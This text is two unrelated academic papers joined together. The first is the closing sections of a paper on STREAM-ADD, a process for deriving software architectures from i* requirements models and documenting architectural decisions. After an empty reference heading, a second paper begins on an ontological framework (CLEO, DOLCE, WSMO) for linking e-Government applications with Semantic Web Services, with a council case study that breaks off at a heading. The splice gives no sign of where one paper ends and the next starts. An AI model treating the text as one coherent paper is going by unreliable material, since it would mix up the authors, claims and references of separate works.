After making and documenting all technology decisions, they are used to refine the architectural model that was previously refined with structural decisions. To perform this refinement, this activity receives as input a set of technology decisions documented in a template and the architectural model obtained from the \textit{Architectural Refinement with Structural Decisions} activity. It is worth noting that only technology decisions that produce a design fragment can be used to refine the architectural model.
As commented before, there is no predefined sequence to apply the architectural decisions in the architectural model refinement. Hence, the architect is in charge of defining this sequence. However, the architect can rely on the Guideline 2 defined in Section B to determine the proper refinement sequence. After doing this, the design fragment of each documented decision has to be analyzed, to identify which parts of the architectural model are going to be affected by them. Then, the refinement can be performed.
As a result, the dashed blue component in Fig. 5 represents the \textit{Google Maps} component that was inserted in the architectural model. The \textit{Map Info Publisher} and \textit{Mapping Handler} components delegate the responsibility of providing maps visualization and interaction services to the \textit{Google Maps} component.
V. \textit{Discussion}
The original Strategy for Transition between \textit{RE}quirements models and \textit{Architectural Models} (STREAM) [8] is a systematic process aimed at defining architectures through a model-driven approach. It strongly relies on transformation rules to incrementally evolve a requirements model in i* into an architectural model. If necessary, this architecture is further detailed through the application of architectural styles or refinement patterns. However, even though STREAM offers a systematic way of deriving architectural models that takes advantage of goal-oriented models and model transformations, it does not support the documentation of architectural decisions and their rationale.
In order to address this limitation, we defined in this work the STREAM-ADD process. This extended process brings to the original STREAM the benefits of documenting architectural design decisions. Even though we did not perform a thorough evaluation of our process, the results reported in the software architecture literature suggest that the benefits of documenting architectural decisions far outweigh the extra design effort required by this process.
Moreover, our process also allows the early architectural model, derived by the application of the first two STREAM activities, to be better refined through architectural decisions. The architectural model refinement with structural and technology decisions activities of STREAM-ADD allow the specification of a more complete components-and-connectors architectural view than the original STREAM process.
It is important to note that the new STREAM-ADD process does not aim to systematize the actual decision-making. Instead, it provides a set of activities that aid the architect in documenting these architectural decisions. In other words, a software architect can make every architectural decision that she considers necessary, but she needs to document the rationale that led her to make the decision and how this decision affects requirements and architectural models. Nonetheless, as a positive side effect, the documentation steps provide some guidance to the software architect regarding the decision-making, as they require the documentation of some elements that could otherwise be overlooked.
In the interest of clarity, the proposed process was presented sequentially, like a waterfall model. However, it was in fact conceived as an iterative and incremental process. For instance, considering the first two activities of the Architectural Model Refinement sub-process in the context of an industrial project, it is more likely that some structural decisions will be documented and then applied to the model. Next, other new structural decisions will be documented and also applied to the model, and so on.
It is also worth noting that, as in the original STREAM approach, the outcome of the process depends on the quality of the input artifacts (e.g., $i^*$ models). Thus, if poor-quality $i^*$ models are used, the derived architectural model is likely to be of poor quality as well.
In the following sub-section we discuss our approach in comparison with other approaches for architecture derivation from requirements models and for architectural decisions documentation.
A. Related Work
Different strategies, techniques and models can be used when deriving architectures from requirements models. The SIRA approach [6], for instance, uses $i^*$ models as input, resulting in an architectural model that uses organizational architectural styles. The work by Chung et al. [22] has some similarities with our process, but it lacks the documentation activities that are essential in our proposal. The UML Components process [23] proposes a set of activities to derive a UML component diagram from use case models and from a business conceptual model. However, it derives a limited architecture (always in four layers) and does not support structural and technological decision-making. Other approaches that use the $i^*$ modeling language as the starting point of software specification, such as PRIM [24], do not support a systematic transition from requirements specifications to architectural design descriptions.
Silva et al. [25] propose a set of mapping rules between an aspectual goal model and an aspectual version of Acme. However, this work does not support any kind of architectural decision. The CBSP approach [26] creates intermediate models to facilitate the development of architectures from requirements, but it lacks proper support for making and documenting technology decisions. Galster et al. [27] define requirements for architecture derivation processes, based on a review of approaches presented in the literature. Our approach does not properly satisfy the following requirements: underlying formal approach; manage different architectural views; reuse of architectural knowledge; handle different modeling notations. In particular, we plan to tackle the issue related to architectural views in future work.
Architectural design decision documentation plays a key role in our approach and has been the focus of several studies in the literature. Shahin et al. [18] describe a survey on architectural decision documentation models, which vary in their degree of formality from textual templates to well-defined metamodels. The survey identifies four major elements – decision, constraint, solution, rationale – and eight minor elements – problem, group, status, dependency, artifact, consequence, stakeholder, phase/iteration. All twelve elements are included in our template. A novel contribution of our paper is the use of goal-based requirements models to drive documentation activities. Moreover, our approach relies on NFR-based models to define the decision rationale, which not only describe the rationale but may also help in the decision-making process. It is worth noting that architectural design decision documentation is the foundation of the architectural knowledge management area; see [3] for some works in this research line.
VI. Conclusions
This paper presented STREAM-ADD, a process that extends the original STREAM architectural derivation process to create a more complete architectural description by encompassing both the architectural models and the architectural decisions. The first and second activities were maintained as-is from the original STREAM process. In the third activity, the early architectural model generated by model transformations is refined with further architectural decisions.
The third activity was extended by defining a subprocess composed of four sub-activities: the first two are related to the structural architecture, whereas the last two are related to technology decisions. In order to support the realization of these sub-activities, we presented a set of steps and general guidelines for each activity.
As future work, we expect to develop tool support for our approach. Such a tool would need to support all documentation and modeling activities of the process. We also intend to apply the STREAM-ADD process in the architecture specification of more complex systems, especially in an industrial context.
Our approach still needs to be extended to support the systematic specification of other architectural views, including behavioral characteristics of the architecture. Finally, we acknowledge that thorough experimentation must be performed in order to evaluate and improve the STREAM-ADD process.
ACKNOWLEDGMENTS
This work has been supported by the Brazilian institutions: Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) and Coordenação de Aperfeiçoamento de Pessoal de Nível Superior (CAPES).
REFERENCES
Knowledge Modelling for Integrating E-Government Applications and Semantic Web Services
Alessio Gugliotta, Liliana Cabral and John Domingue
Knowledge Media Institute, The Open University
Walton Hall
Milton Keynes, MK7 6AA, UK.
{a.gugliotta, l.s.cabral, j.b.domingue}@open.ac.uk
Abstract
Service integration and domain interoperability are the basic requirements in the development of current service-oriented e-Government applications. Semantic Web and, in particular, Semantic Web Service (SWS) technology aim to address these issues. However, the integration between e-Government applications and SWS is not an easy task. We argue that a more complex semantic layer needs to be modeled. The aim of our work is to provide an ontological framework that maps such a semantic layer. In this paper, we describe our approach for creating a project-independent and reusable model, and provide a case study that demonstrates its applicability.
Introduction
The current trends in e-Government applications call for joined-up services that are simple to use, shaped around and responding to the needs of the citizen, and not merely arranged for the provider’s convenience. In this way, the users need have no knowledge of – nor direct interaction with – the government entities involved. On practical grounds, the integration of services is a basic requirement of service-oriented systems, which aim at gathering and transforming processes - needed for a particular user - into one single service and the corresponding back-office practices. They enable the building of agile networks of collaborating business applications distributed within and across organization boundaries. Thus, services need to be interoperable in order to allow for data and information to be exchanged and processed seamlessly across government.
The Semantic Web (T. Berners-Lee 2001) aims to alleviate integration and interoperability problems. By allowing software agents to communicate and understand the information published, the Semantic Web enables new ways of consuming services. In particular, Semantic Web Service (SWS) technology provides an infrastructure in which new services can be added, discovered and composed continually, and the Public Administration (PA) processes automatically updated to reflect new forms of cooperation (Gugliotta et al. 2005). It combines the flexibility, reusability, and universal access that typically characterize a Web Service, with the power of semantic mark-up, and reasoning in order to make feasible the invocation, composition, mediation, and automatic execution of complex services with multiple conditional paths of execution, and nested services inside them (Sycara et al. 2003), (Domingue et al. 2004).
However, the integration between e-Government applications and SWS’s is not an easy task. We present an approach for knowledge management based on SWS technology and the following e-Government requirements:
• the PA worker - and in general a domain expert - does not directly use the SWS infrastructure to represent knowledge internally. For instance, organizations will likely adopt their own workflow paradigm to describe their processes (van der Aalst, ter Hofstede, & Weske 2003).
• The PA work routines involve interactions with non-software agents, such as citizens, employees, managers and politicians. Multiple viewpoints need to be considered.
• In real cases, component services are not atomic, and cannot in general be executed in a single-response step; they may need to follow an interaction protocol with non-software agents that involves multiple sequential, conditional and iterative steps. For instance, a service may require a negotiation between the user and the provider.
• Web service description is an important but restricted aspect of an e-Government service-supply scenario.
In this paper, we argue that a more complex semantic layer for managing government services needs to be modelled - and a middleware system designed on such a model - in order to meet the requirements of real-life applications. In particular, we identify three knowledge levels.
Configuration, describing the context in which services are supplied: requirements, resources, actor’s role, business processes, and transactions of an e-Government service-supply scenario.
Re-configuration, describing the context in which services may be modified: legislation, policies, and strategies influencing the development and management of an e-Government service-supply scenario.
Service delivery, adopting SWS technology as the base for the description, discovery, composition, mediation, and execution of (Web) services.
As a result, integrating e-Government applications with SWS's requires a framework that maps and combines the knowledge levels described above. The aim of our work is to provide such a framework, one with which most PA's – or organizations in general – can identify and from which they can work when designing and delivering e-Government services. Such a general framework can be adapted and applied as appropriate.
Our approach is grounded on a technological paradigm able to fit a general distributed organization of knowledge, with focus on the supply of services. The proposed framework is considered from the following two different dimensions.
(i) Conceptual modelling: this is a two-stage process that first creates a conceptualization of the reality in terms of conceptual models, and then uses ontologies to represent the semantic structure of the knowledge involved, enabling knowledge use and reuse. The result is an ontological framework for service-oriented e-Government applications.
(ii) Creating an infrastructure for semantic interoperability: software modules implement the functionalities of a middleware system that enables automated interpretation and paves common ground for services. The result is a semantically-enhanced middleware for service-oriented e-Government applications.
Current work concerns the first dimension, on which we shall focus in the rest of the paper.
Related Work
Although service-oriented computing is a relatively new field, many e-Government applications have been developed and various approaches have been proposed.
To quote a few examples, eGov (eGOV 2004), and EU-PUBLI.com (EU-PUBLI 2004) define architectures based on Web services interfacing PA legacy systems. The goal of these projects is to achieve one-stop E-Government. XML dialects are used to define metadata and orchestration of services.
SmartGov (SmartGov 2004), ICTE-PAN (ICTE-PAN 2004) and E-Power (Engers et al. 2004) projects use ontologies for representing e-Government knowledge. In particular, SmartGov and ICTE-PAN developed two ontologies describing the profile of a service.
OntoGov (OntoGov 2004) and TerreGov (TerreGov 2004) adopt the SWS approach for describing services provided by PA's. However, they do not take full advantage of SWS technology. OntoGov develops its own ontology for describing e-Government services, mixing aspects of the two main approaches, OWL-S (OWL-S Coalition 2004) and WSMO (Dumitru, Holger, & Uwe 2004), in order to satisfy e-Government requirements that neither approach addresses. TerreGov adopts OWL-S for describing and discovering services but uses the BPEL language for describing service compositions (eProcedure).
These approaches face more or less the same problems: there is no generic domain analysis of the overall PA system at any level of granularity; there are no generic PA models for processes and objects; there are no ontologies for modelling PA objects and relationships; and there are no standard vocabularies for describing concepts. Consequently, researchers have had to build PA ontologies from scratch as test-beds for demonstrating the functionalities of their systems. The main focus of these initiatives is not to build a PA domain ontology, but rather to test and validate specific technological solutions. As a result, they propose ad hoc descriptions of the PA domain that are far from reusable.
Moreover, existing approaches usually address specific service-oriented models, where the provider's point of view plays a central role. However, the e-Government scenario is composed of several actors. Each of them deals with different kinds of knowledge, conceptions, and processes; in other words, they have different viewpoints. Such viewpoints influence and relate to the service differently.
Requirements for the Conceptual Model
Starting from the analysis of the above projects, we defined the following objectives of our approach.
General purpose. The aim of our work is not to represent all of the existing concepts and relations connected to the e-Government domain. As in the ICTE-PAN project, the idea is to create modules that guide domain experts in developing domain ontologies describing the specific scenario, and that help developers implement SWS's based on the domain experts' representations. In particular, these modules outline a generic service-supply scenario that domain experts can adapt and extend, using different levels of granularity, on the basis of the scenario's characteristics. The result is a re-usable, extensible, and flexible model.
Life Event approach. All of the projects introduced here adopt a service-oriented approach. The service provided by organizations is the central concept. For instance, in the eGov and OntoGov projects, the user point of view is described by a taxonomy of life events simply representing how to arrange the services in the portal. In our vision, the life event concept plays a central role prompting the supply of services by several organizations and representing the point of contact among the different actor’s viewpoint. It represents the starting point for the description of the involved scenario knowledge.
Contextualization. Our approach allows us to contextualize an e-Government scenario in terms of descriptions – i.e., to describe various notions of context (non-physical situations, topics, plans, beliefs, etc.) as entities. In particular, we distinguish between descriptive entities – independent views on a scenario by the different involved actors – and the actual objects they act upon, representing the concepts of the actors' vocabularies. This captures that multiple overlapping (or alternative) contexts may match the same world or model, and that such contexts can have systematic relations among their elements.
PA Autonomy and Cooperative Development. Domain standardization (as introduced by the different e-Government projects) can help, but it does not necessarily unify the aims and languages of all the involved organizations and actors. Each of them should keep its autonomy in describing its own domain. In fact, distinct organizations may use or describe the same concepts differently. This implies the need to address mediation between heterogeneous sources, but it allows the cooperative development of an e-Government application.
**Business Process and Interaction description.** The flow of e-Government processes can be modeled using standard control structures and tasks. Different projects adopt different approaches: for instance, OntoGov adopts the OWL-S process model while TerreGov will adopt BPEL. Unlike the other approaches, we introduce an Interaction description, a useful means of bringing model checking into the requirements gathering process, as well as a key but too often neglected component of business processes. Specifically, we distinguish between a plan, describing processes and organising concepts within an actor's viewpoint, and an interaction, describing mutual actions involving two different actors' viewpoints.
**Delegation.** Service integration will allow organizations to delegate the execution of some of their tasks to external organizations. This includes looking for and identifying the right organization. In our approach, we explicitly define how to declare delegated tasks. This aspect is strictly connected to the interaction description above, which represents the protocol for consuming the delegation.
**SWS standards.** SWS technology addresses the integration and interoperability issues between services provided by heterogeneous organizations. However, some e-Government requirements cannot be represented by existing SWS approaches. In our approach, we clearly distinguish between the e-Government scenario description – addressing the e-Government requirements – and SWS descriptions. The two levels are integrated without requiring changes to SWS standards.
**Meta-Modelling the Conceptual Model**
A conceptual model is an abstract and simplified description of the reality that has to be represented. An explicit specification of a conceptual model is an ontology.
To match the re-usability requirement of our approach, we refer to the conceptual model as an abstract definition of how to describe and develop a domain of interest: a model of modelling (Fernandez-Lopez 2001). It points out the building blocks that are used in models of the domain, the relationships between the building blocks, and how to build models.
The ontologies mapping such a conceptual model are domain-independent ontologies – i.e. meta-ontologies – specifying the schema to be followed by the modeling process and the general concepts and relations that may be extended and adapted.
Applying a specific scenario to the meta-model yields a model for that specific application (Figure 1). Starting from the meta-ontologies, the resulting ontologies describe application-dependent concepts, relations, axioms, etc.
**Figure 1: Meta-modelling approach.**
The meta-modelling approach is the base for the cooperative and distributed development of an application-specific conceptual model. It allows involved actors to keep their autonomy in the description of their domains: each actor follows the proposed schema (meta-graph) to create ontologies extending and adapting the meta-ontologies. All of the obtained ontologies describe the application-specific conceptual model; each of them can define one or more actor’s viewpoints and may refer to other application ontologies.
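The extension relationship between meta-ontologies and application ontologies can be pictured, very loosely, as subclassing. This is only an analogy – ontology extension is richer than class inheritance – and every name below is our own illustration, not part of CLEO:

```python
# Loose analogy only: ontology extension is richer than class inheritance,
# but the idea of specializing shared meta-concepts is similar.
# All names here are hypothetical.

class LifeEvent:                        # meta-ontology concept
    granularity = "generic"

class PatientMovesHouse(LifeEvent):     # application-ontology specialization
    granularity = "change-of-circumstance"
    triggers = ["swift-update", "elms-update", "eligibility-check"]
```

An application ontology built this way keeps the schema of the meta-ontology while refining its concepts for one concrete scenario.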
**Ontologies for Meta-Modelling**
To facilitate the building of meta-ontologies, we refer to existing reference ontologies. We extend them and reuse some of their modules to create our ontologies. Actually, we refer to DOLCE (Oltramari et al. 2002) as upper ontology for describing domain concepts, its Description & Situation module (Gangemi & Mika 2001) as approach for knowledge contextualization (i.e. representing various points of view on a scenario, possibly with different granularity), and WSMO (Dumitru, Holger, & Uwe 2004) for describing Web services.
**Descriptive Ontology for Linguistic and Cognitive Engineering (DOLCE)**
DOLCE belongs to the WonderWeb project Foundational Ontology Library (WFOL) and is designed to be minimal in that it includes only the most reusable and widely applicable upper-level categories, rigorous in terms of axiomatization and extensively researched and documented (Oltramari et al. 2002).
DOLCE has been chosen due to its internal structure: rich axiomatization, modularization, explicit construction principles, careful reference to interdisciplinary literature, and a commonsense orientation. In addition, being part of the WFOL, DOLCE will be mapped onto other foundational ontologies – possibly more suitable for certain applications – and extended with modules covering different domains (e.g., legal and biomedical) and with lexical resources (e.g., WordNet-like lexica). Internal consistency and external openness make DOLCE especially suited to our needs.
The Description & Situations (D&S)
D&S is the module of the DOLCE ontology that describes context elements. While modelling physical objects or events in DOLCE is quite straightforward, intuition is at odds when we want to model non-physical objects such as social institutions, plans, organizations, regulations, roles or parameters. The representation of context is a common problem in many realistic domains across technology and society, which are full of non-physical objects: non-physical situations, norms, plans, beliefs, and social roles are usually represented as sets of statements rather than as concepts.
D&S thus amounts to a theory of ontological contexts, because it is capable of describing various notions of context or frames of reference (non-physical situations, topics, plans, beliefs, etc.) as entities. It features a philosophically concise axiomatization.
D&S introduces a new category, Situation, which reifies contexts, episodes, configurations, states of affairs, cases, etc., and is composed of entities of the ground ontology (e.g., a domain ontology derived from DOLCE). A Situation satisfies a Situation Description, which represents a conceptualization (as a mental object or state) – hence generically dependent on some agent – and which is also social, i.e., communicable.
Situation descriptions are composed of descriptive entities, i.e., Parameters, Functional Roles and Courses of Events. Axioms enforce that each descriptive component links to a certain category of DOLCE (the actual objects they act upon): Parameters are valued by Regions, Functional Roles are played-by Endurants and Courses of Events sequence Perdurants.
This captures that multiple overlapping (or alternative) contexts may match the same world or model, and that such contexts can have systematic relations among their elements.
D&S shows its practical value when applied as reference ontology for structuring application ontologies that require contextualization. As we will see in the remainder of this paper, this is the case when describing the e-Government service-supply scenario.
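The typed links just described – Parameters valued-by Regions, Functional Roles played-by Endurants, Courses of Events sequencing Perdurants – can be sketched in a few lines of Python. This is our own drastic simplification for illustration, not DOLCE's axiomatization, and all instance names are invented:

```python
from dataclasses import dataclass

# Ground-ontology (DOLCE) categories, heavily simplified.
@dataclass
class Region:
    value: str            # e.g. a spatial or temporal region

@dataclass
class Endurant:
    name: str             # e.g. a person or organization

@dataclass
class Perdurant:
    name: str             # e.g. an event or process

# Descriptive entities of a Situation Description.
@dataclass
class Parameter:
    name: str
    valued_by: object     # must be a Region

@dataclass
class FunctionalRole:
    name: str
    played_by: object     # must be an Endurant

@dataclass
class CourseOfEvents:
    name: str
    sequences: list       # must sequence Perdurants

def satisfies(description):
    """A situation satisfies the description only if every descriptive
    component is grounded in an entity of the right DOLCE category."""
    ok = all(isinstance(p.valued_by, Region) for p in description["parameters"])
    ok = ok and all(isinstance(r.played_by, Endurant) for r in description["roles"])
    ok = ok and all(isinstance(e, Perdurant)
                    for c in description["courses"] for e in c.sequences)
    return ok

desc = {
    "parameters": [Parameter("new-address", Region("Chelmsford"))],
    "roles": [FunctionalRole("case-worker", Endurant("Community Care officer"))],
    "courses": [CourseOfEvents("change-of-circumstance",
                               [Perdurant("address-notification")])],
}
```

The point of the sketch is only the shape of the constraint: each descriptive entity is a first-class object whose grounding is checked against a category of the ground ontology.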
Web Service Modelling Ontology (WSMO)
We adopt WSMO (Dumitru, Holger, & Uwe 2004) because it follows design principles that embrace our approach and that other standards do not have.
Strict Decoupling. Decoupling denotes that WSMO resources are defined in isolation, meaning that each resource is specified independently without regard to possible usage or interactions with other resources. This complies with our distributed and cooperative approach.
Centrality of Mediation. As a complementary design principle to strict decoupling, mediation addresses the handling of heterogeneities that naturally arise in distributed environments. Heterogeneity can occur in terms of data or process. WSMO recognizes the importance of mediation for the successful deployment of Web services by making mediation a first class component of the framework.
Ontological Role Separation. User requests are formulated independently of (in a different context than) the available Web services. The underlying epistemology of WSMO differentiates between the desires of users or clients and available Web services. This complies with our multi-viewpoint approach around the concept of life event.
Service versus Web service. A Web service is a computational entity which is able (by invocation) to achieve a goal. A service in contrast is the actual value provided by this invocation. Thus, WSMO does not specify services, but Web services which are actually means to buy and search services. This complies with our clear separation between the description of Web services and the context of e-Government service-supply where Web services are used.
The main components of WSMO are Ontologies, Goals, Web Services and Mediators.
Goals represent the objectives that users would like to achieve via a Web Service (WS). The WSMO definition of goal describes the state of the desired information space and the desired state of the world after the execution of a given WS. A goal can import existing concepts and relations defined elsewhere, by either extending or simply re-using them as appropriate.
Web Service descriptions describe the functional behavior of an actual WS. The description also outlines how Web Services communicate (choreography) and how they are composed (orchestration).
Mediators define mappings between components: for instance, a goal can be related to one or more web services through mediators. They facilitate the clear-cut separation of different interoperability mechanisms.
Ontologies provide the basic glue for semantic interoperability and are used by the three other components.
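As a toy illustration of how these components relate – a goal, candidate Web service descriptions, and a mediator-style matching step – consider the following sketch. Real WSMO descriptions are written in dedicated languages such as WSML, not Python, and every name below is invented:

```python
# Hypothetical, much-simplified stand-ins for WSMO descriptions.

goal = {
    "name": "NotifyChangeOfAddress",
    # desired state of the world after execution
    "postcondition": {"address-updated": True},
}

web_services = [
    {"name": "SwiftUpdateService",                  # invented service name
     "capability": {"address-updated": True}},
    {"name": "ElmsQueryService",                    # invented service name
     "capability": {"tenancy-listed": True}},
]

def discover(goal, services):
    """A mediator-style step: link the goal to every Web service whose
    advertised capability entails the goal's postcondition."""
    return [ws["name"] for ws in services
            if all(ws["capability"].get(k) == v
                   for k, v in goal["postcondition"].items())]
```

Note how the strict-decoupling principle shows up even here: the goal and the service descriptions are written in isolation, and only the mediation step relates them.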
Mapping the Conceptual Model: the Ontological Framework
As the e-Government field involves several aspects, we do not refer to a unique conceptual model. Our work is founded on existing – and in some cases well known – conceptual models that define the elements of a government service-supply scenario, specify the actors and roles of an e-Government application, introduce the life event metaphor as the base for a multi-viewpoint approach, and describe the aspects of the e-Government business processes. The main elements described by these conceptual models are combined and mapped into a sound ontological framework. The latter introduces the following two clean separations.
(i) Context vs SWS. We distinguish between the description of the environment where the services are provided, used, and managed by different actors and the SWS’s allowing the automatic discovery, composition, mediation, and execution of services. The former maps the e-Government application entities and requirements, and, particularly, the aspects that cannot be captured by SWS’s such as interaction with non software agents, multiple viewpoints, distinct infrastructure to represent knowledge internally, negotiation between user and provider. It represents input for the latter that completes the scenario with the technical description of computable entities that are able to achieve a goal. This
separation allows the integration of SWS standards and e-Government applications without affecting SWS standards.
(ii) Context vs Vocabulary. We distinguish between descriptive entities (independent views on a scenario by different involved actors) and the actual objects they act upon (representing the vocabulary of different involved actors). This separation allows to adopt distinct – and in some cases already existing – vocabularies for multiple viewpoints.
Figure 2 depicts the architecture of our framework and its three meta-ontologies.
Core Life Event Ontology (CLEO) is the heart of our framework allowing the description of the configuration and reconfiguration knowledge by multiple e-Government actors. It represents the contextualization of the scenario.
Service Ontology allows the description of the service delivery knowledge. Based on the above scenario description, developers may provide SWS descriptions addressing integration and interoperability issues; i.e. it completes CLEO by describing Web services and their composition and mediation.
Domain Ontology defines the vocabularies used by multiple actors in the description of their viewpoints. It represents the lexical layer of the framework.
Finally, other ontologies can be imported in order to extend or specialize the conceptual model. For instance, an existing ontology can be used to describe the specific vocabulary of an involved actor.
CLEO has been designed to be modular. Figure 2 shows the main modules of which it is composed. Every module can be readily extended and freely reused, and deals with one particular aspect of our conceptual model.
Life Event Description Module: it is the heart of CLEO, representing the life events and all actors’ viewpoints that provide a description of them. It adopts the other modules to provide a sound description of the context around the life event.
State of Affair Description Module: gathers the elements (roles, attributes, and parameters) that are relevant in the description of a life event situation.
Conception Description Module: represents the conceptions that actors may describe in their viewpoint related to a specific state of affairs and life event: needs, offers, policies, and legislation.
Plan Description Module: allows the description of the tasks associated with the descriptions of a scenario and the organization into a plan within an actor’s viewpoint.
Interaction Description Module: plays a double role, representing the interactions between two distinct viewpoints, and capturing possible mismatches in the description of exchanged resources. It is the unique module shared between two distinct viewpoints.
Finally, CLEO introduces a knowledge elicitation methodology that first helps domain experts create a full description of a specific e-Government context, using models close to their experience and the specific languages of the different involved domains, and then guides application developers in implementing SWS descriptions, possibly inferring knowledge from the context description.
The Domain Ontology
The Domain Ontology encodes concepts of the PA domain: organizational, legal, economic, business, information technology and end-user. They are the building blocks for the definition of CLEO and Service Ontology concepts.
Our aim is not to cover all the aspects connected with e-Government. Distinct PA’s could use the same concepts differently or vice-versa adopt distinct terms for the same concept; a single PA may not share the same point of view and have different interoperability needs from other PA’s. Multiple actors can use different vocabularies, also within the same organization. Standardization can help, but it does not necessarily unify the aims and languages of all the involved actors. It is important that every PA (or actor) keeps its autonomy in the description of its own domain (or viewpoint);
this does not affect our ultimate goals of interoperability and integration.
We designed a structure that resides on two levels of abstraction: the *conceptual* and the *instance* level. Figure 3 shows four distinct ontologies (A, B, C, and D) derived from the conceptual level by extending and adapting its existing concepts and relations. They compose the instance level and are independent of each other. Each of them describes a particular domain connected to a viewpoint; e.g., legislative terminology, the technical terminology of an organization or field, the actors' language, managers' tasks, etc.
**Figure 3**: The two-levels structure of the Domain Ontology.
It is important to note that the aim of such a structure is to represent a heterogeneous scenario, not to create mappings between different concepts or to solve existing mismatch problems. In our approach, these tasks are delegated to the service delivery knowledge level, i.e., to service execution time, when the need to solve a mismatch arises.
**The Service Ontology**
The Service Ontology completes the representation of the scenario, modelling the *service delivery knowledge level* by means of SWS technology. It allows the completion of the descriptions of (i) the services implemented by means of Web services, (ii) the e-Government processes that can be modeled as compositions of Web services (without user interaction), and (iii) the users' requests for services. Moreover, it enables the specification of the mechanisms for solving existing mismatch problems at the data and process levels between distinct viewpoints. In other words, it represents the knowledge useful at runtime.
Because representing SWS’s requires the use of technical concepts, the developers are responsible for the creation of this ontology. Concepts such as precondition, postcondition, grounding, orchestration and choreography of Web services are defined at this level. As we adopt the WSMO approach for SWS’s, and this ontology is composed by three main modules: Goal Ontology, Web Service Ontology, and Mediation Ontology. Note that our work does not consist of improving existing SWS solutions, but enabling their application in the designed ontological framework.
Figure 4 depicts the intersection between the representations of the SWS’s and e-Government applications context provided by the Service Ontology and CLEO, respectively. The two ontologies model two distinct knowledge levels that are provided by distinct kinds of actor, and obviously described by distinct modules. However, they intersect on two concepts: the goal and service descriptions. Such concepts are their points of contact, and, thereby, the way to actualize the integration between SWS and the e-Government application context descriptions. This conceptual overlapping allows the following two integration directions.
*Using SWS descriptions within the context description*: WSMO compliant descriptions of goal and services can be directly adopted within the context description for describing user’s requests and Web services.
*Inferring knowledge from the context for creating SWS descriptions*: the description of the context where the services are supplied may serve as the base for the definition of WSMO-compliant goal and service descriptions. This also involves the definition of the mediation mechanisms.
To carry out the above integration purposes, we first derived the concepts of the Service Ontology from the WSMO meta-models and then aligned these concepts with the CLEO meta-models (Figure 5). Axioms and rules enrich the Service Ontology, specifying the above alignment and describing inferences drawn from CLEO descriptions in order to complete the WSMO-compliant descriptions and handle mismatches. The Service Ontology may integrate further SWS approaches by simply adopting the same alignment mechanism.
**A Change of Circumstances Case Study**
We illustrate the elicitation methodology and the main elements of CLEO modules through an e-Government case study within the *change of circumstance scenario*. The prototype is a portal for Essex County Council in the UK (Drumm *et al.* 2005), (Cabral *et al.* 2005), where the following two governmental agencies were involved.
**Community Care (Social Services) in Essex County Council:** typically has a coordinating role in relation to a range of services from a number of providers, and special responsibility for key services such as support for elderly and disabled people (day centers, transportation). It uses the SWIFT database as its main records management tool.
**The Housing Department of Chelmsford District Council:** handles housing services and uses the ELMS database.
In this scenario, a case worker of the Community Care department helps a citizen to report his/her change of circumstance (e.g. address) to different agencies involved in the process. In this way, the citizen only has to inform the council once about his/her change, and the government agency automatically notifies all the agencies involved. An example might be when a disabled mother moves into her daughter’s home. The case worker opens a case for a citizen who is eligible to receive services and benefits - health, housing, etc. Multiple service providing agencies need to be informed and interact.
The methodology
The proposed methodology improves the capture of e-Government service-supply scenario requirements and knowledge, in a robust and repeatable manner, whilst also eliciting an awareness of significant facets of the scenario much earlier during the knowledge capture phase.
The modules of CLEO represent the stages of the methodology that have to be followed and define the structure of the knowledge that has to be represented. CLEO indicates how real-life interaction scenarios can be decomposed and translated into models. The Domain Ontology will collect the concepts and terms extracted during the elicitation process, and the Service Ontology will contain the final result of the process: the SWS descriptions.
The methodology is summarized in the following stages:
1. Life event and actor analysis. The e-Government scenario is segmented along two orthogonal dimensions: life events and actors' viewpoints. Segmentation allows us to focus on a reduced and well-delimited sector of the scenario.
2. Viewpoint analysis. This is the distributed and cooperative phase. Each identified actor independently defines its viewpoint on the life event. The appropriate life-event-description class (user, provider, manager, or politician) has to be adopted for specifying the structure of the viewpoint. The following sub-stages are involved in this phase:
- (a) State of Affair analysis. Main concepts of the domain are modelled as descriptive entities and used to describe the overall scenario of the problem that is being investigated.
- (b) Interaction analysis. All of the interactions between pairs of user-provider and provider-provider viewpoints are identified and described by means of the Interaction Description module.
- (c) Conception analysis. The description of the scenario is improved by adding the conceptions (need, offer, policy, legislation) of the actors onto the state of affairs previously defined. In the cases of user and provider viewpoints, the defined conceptions refer to the defined interaction descriptions.
- (d) Plan analysis. Describes the processes and dynamics within the viewpoint. Concepts connected to events and tasks are elicited.
3. Model Specific Scenario. Instances of the descriptions and concepts are created. In this way, the model is tested by enforcing a set of check axioms and rules to refine the representation.
4. Create the SWS descriptions. The obtained model is used as input for the SWS descriptions created by developers.
Life event and actor analysis
The first stage is to examine the use case in order to identify the life events within it.
Our approach is based on the life event metaphor, which prompts the supply of services by PAs. We may simply consider how many different views exist on a life event: the citizen’s, the PA’s, the manager’s, the politician’s, etc. Life-Event and Life-Event-Description are central concepts of CLEO, referring respectively to the Situation and Description concepts of the D&S ontology.
Currently, we consider four kinds of life event description (user, provider, manager, politician), but further views may be added in the future as extension needs arise.
In the following we list the two life events considered in the case study.
Patient Moves House: A patient of the Social Services notifies that he/she has changed address. This event triggers updates to some of the information stored in the SWIFT and ELMS databases, and a check of the patient’s eligibility for the old and new services and benefits provided by the involved organizations. If the patient is eligible for new services, a new patient assessment is necessary.
Patient Passes Away: A patient of the Social Services dies. The date of death should be set in the SWIFT database, and services and benefits have to be canceled.
In the rest of the dissertation, we refer to the first life event. The second stage of this phase is to define the actors that describe their viewpoints. In this case study two public administrations were involved.
**Community Care (Social Services) in Essex County Council:** typically has a coordinating role in relation to a range of services from a number of providers and special responsibility for key services such as support for elderly and disabled people (day centers, transportation). It uses the SWIFT database as its main records management tool.
**The Housing Department of Chelmsford District Council** handles housing services and uses the ELMS database.
Moreover, the end-user is the *case worker* of the Community Care department who helps citizens report their changes of circumstances (e.g., address) to the different agencies involved in the process. In this way, the citizen only has to inform the council once about the change, and the government agency automatically notifies all the agencies involved.
### Viewpoint analysis
At this stage, we devise three teams for creating three descriptions according to their viewpoints: one user description for representing user requests, and two provider descriptions for representing available services. The three teams work independently building and using the respective lexical layers, and interfacing only to reach an agreement at the Interaction analysis stage. In this way, we can simulate the situation of distributed organizations that, driven by the framework, can autonomously describe their own domain.
Figure 6 shows that, for each domain, we refer to two ontologies: one that will contain the terms associated with the legacy systems (SWIFT, ELMS), and one that will contain other specific terms of the domain. All of the above ontologies will form the instance level of the Domain Ontology (Section ). Without losing generality, we assume that the case worker and community care viewpoints share the same ontologies.

### State of Affair analysis
